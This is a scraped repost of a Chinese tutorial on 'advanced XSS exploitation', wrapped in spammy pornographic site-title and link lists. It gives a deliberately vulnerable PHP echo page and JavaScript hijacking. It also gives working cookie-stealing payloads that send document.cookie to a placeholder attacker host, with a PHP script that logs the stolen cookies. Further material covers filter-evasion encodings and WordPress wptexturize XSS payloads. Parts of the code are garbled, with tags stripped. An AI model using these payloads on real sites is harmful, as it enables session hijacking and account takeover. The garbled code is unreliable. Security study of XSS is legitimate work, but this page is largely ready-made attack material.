日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

ajax在Xss中的利用,XSS高级利用

發(fā)布時間:2025/4/5 编程问答 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 ajax在Xss中的利用,XSS高级利用 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

點擊閱讀

利用 xss 的 javascript 劫持

一個 xss 漏洞示例頁面

1

2

3

4

5

6

7

8

9

10

$xss = @$_GET['xss'];

if($xss!==null){

echo $xss;

}

?>

這段代碼中首先包含一個表單,用于向頁面自己發(fā)送 GET 請求,帶一個名為 xss 的參數(shù)。 然后 PHP 會讀取該參數(shù),如果不為空,則直接打印出來,這里不存在任何過濾。也就是說,如果 xss 中存在 HTML 結構性的內容,打印之后會直接解釋為 HTML 元素

例如

1

2

3

4

5

6

7

8

9

10

Javascript Hijack with XSS

script.js 內容為

1

2

3

4

function Hello()

{

alert("hi");

}

當傳入 xss 為

xss=function Hello() { alert("hacked"); } 時

鼠標點擊會彈出 hacked 而非預定的 hi

這里利用 xss 漏洞劫持 javascript 代碼

可以傳入以執(zhí)行較長的代碼

XSS 會話劫持

可以在含 xss 漏洞的地方使用以下類似代碼盜取 cookie

window.open("http://x.x.x.x/getcookie.php?cookie="+document.cookie)

document.location="http://x.x.x.x/getcookie.php?cookie="+document.cookie;

getcookie.php:

1

2

3

4

5

$cookie=@$_GET['cookie'];

$path="./cookies.txt";

file_put_contents($path,$cookie.PHP_EOL, FILE_APPEND);

?>

為防止察覺,使用 javascript

script.js:

1

2

3

var script =document.createElement('script');

script.src='http://x.x.x.x/getcookie.php?cookie='+escape(document.cookie);

document.body.appendChild(script);

xss 常用的編碼

bWAPP 中的 XSS - Reflected (AJAX/XML)

輸入 <img src=1 οnerrοr="alert(document.cookie)">

彈窗獲取 cookie

<、>分別為的 HTML tag

第一個,html 實體編碼,例如:

alert()

第二個,進制類,例如:

x61x6cx65x72x74x60x78x73x73x60

某些時候,也有不帶 x,例如:5c6a

第三個,Unicode,例如:

u0061u006cu0065u0072u0074u0060u4e2du6587u4e5fu53efu4ee5u0060

第四個,純轉義,例如:

' " < >

這樣的在特殊字符前加進行轉義。

html 標簽中:

1

2

3

4

5

html中當然會支持html實體編碼,例如=,也有<

支持十六進制,但是要以開頭,其中x大寫小寫無所謂。

支持十進制,要以開頭,注意,沒有x哦。

支持數(shù)字部分高位補充0,例如=,=這兩是一樣的。

可能你已經(jīng)發(fā)現(xiàn)了,后綴有沒有; 都無所謂

javascript 中:

1

2

3

eval函數(shù)里,支持十六進制,但是要以 x 開頭,x只能小寫!必須兩位,例如:x5c

eval函數(shù)里,支持八進制,但是要以 開頭。必須兩位,例如:134

eval函數(shù)里,還支持u前綴的unicode,本質是:16進制的ascii碼。必須是四位,例如:u005c

WordPress XSS 漏洞

于是下載了 wordpress-3.8.3 在虛擬機測試

發(fā)現(xiàn)管理員登陸時,編輯內容并不會被過濾

編輯文章,回到首頁查看

但是 chrome 下彈出的 cookie 似乎被過濾了,最關鍵的部分并沒有,利用 js 在服務器上獲取的 cookie 同樣不完整

firefox 下卻沒問題

以下兩個地方都被插入了代碼,也會彈出兩次

標題

側欄

去官網(wǎng)下了個最新版 WordPress

管理員的編輯仍不會被過濾

接收到 cookie

wordpress 站點有多個用戶,當不是管理員時

漏洞的成因是在/wp-includes/formatting.php 中的 wptexturize 函數(shù)

formatting.php 應該是用于清理 XHTML 和用特定字符集正確格式化文本

1

2

3

4

5

6

7

8

9

10

11

12

13

function wptexturize($text) {

......

$textarr = preg_split('/(<.>|[.*])/Us', $text, -1, PREG_SPLIT_DELIM_CAPTURE);

foreach ( $textarr as &$curl ) {

......

}

return implode( '', $textarr );

}

這里的正則/(<.>|[.*])/Us會匹配

1

2

3

4

5

6

7

//這個新姿勢能在前臺xss彈窗 不限制用戶權限 后臺的確不能彈窗

[["][a>alert(1)]

前后臺都能彈窗 似乎還是老的onmouseover能用

[[" NOT VULNERABLE]

然而我發(fā)現(xiàn)這 payload 沒什么效果,有時間再好好看看,完善一下

總結

以上是生活随笔為你收集整理的ajax在Xss中的利用,XSS高级利用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 日本一品道 | 就操在线 | 永久黄网站色视频免费观看w | 日本精品视频在线 | 亚洲在线观看一区 | 超碰超碰在线 | 日本久操视频 | 99热网站| 激情免费网站 | 在办公室被c到呻吟的动态图 | 黄色片小视频 | 中文字幕乱码无码人妻系列蜜桃 | 夜色资源网 | 奇米影视欧美 | 屁屁影院一区二区三区 | 好色婷婷 | 香蕉视频官网在线观看 | 麻豆av一区| 国产成人精品国内自产拍免费看 | 美女扒开腿让男人捅 | 能看av的网址 | av自拍| av在线影视| 黄网视频在线观看 | 欧美一级片一区二区 | 午夜神器在线观看 | 三上悠亚中文字幕在线播放 | 欧美日韩在线免费观看 | 午夜精品久久久久久久99热浪潮 | 欧美男女动态图 | 日韩欧美高清在线视频 | 免费级毛片 | 激情久久网站 | 日本黄色特级片 | 亚洲精品黄色片 | 人妖一区 | 午夜肉体高潮免费毛片 | 粗大的内捧猛烈进出视频 | 在线观看一区二区视频 | 久久调教视频 | 亚洲国产成人精品无码区99 | 激情久久av一区av二区av三区 | 日韩欧美国产亚洲 | 久久亚洲一区二区 | 久久人妻精品白浆国产 | 天天久久综合网 | 波多野结衣一区二区三区在线 | 黄色网页在线 | 18禁肉肉无遮挡无码网站 | 中文在线a天堂 | 日韩操比 | 吸咬奶头狂揉60分钟视频 | 中文字幕一区二区三区日韩精品 | 中国性猛交 | 日本在线播放一区 | 在线看日本 | 欧美午夜精品久久久久免费视 | 91久久精品www人人做人人爽 | 欧美老肥妇做.爰bbww视频 | 深夜福利一区二区三区 | 懂色一区二区二区av免费观看 | 天天操天天干天天爱 | 午夜精品福利一区二区蜜股av | 日韩精品欧美在线 | 日韩一区久久 | 九九热精品视频在线 | 欧美一区二区三区久久成人精品 | 成人午夜精品 | 97影院| 女生鸡鸡软件 | 国产精品毛片一区 | 午夜亚洲aⅴ无码高潮片苍井空 | 午夜电影网一区 | 俺来也俺也啪www色 欧洲一区二区视频 | 久久综合资源 | 中文字幕日韩电影 | 日本黄色一级视频 | 牛牛精品视频 | 高清国产午夜精品久久久久久 | 熟妇人妻中文av无码 | 麻豆精品在线视频 | 国产高清一级 | 亚洲综合视频在线观看 | 老司机激情视频 | 人妻丰满熟妇岳av无码区hd | 小俊大肉大捧一进一出好爽 | 李丽珍裸体午夜理伦片 | 国产人妻精品一区二区三区不卡 | 午夜视频在线观看国产 | xxxxx在线 | 国产在线精品自拍 | 国产精品一区二区三区免费在线观看 | 亚洲日本免费 | 蜜臀人妻四季av一区二区不卡 | 人人干人人爱 | 在线看黄色的网站 | www.尤物 | 外国黄色网 | www.xxx亚洲|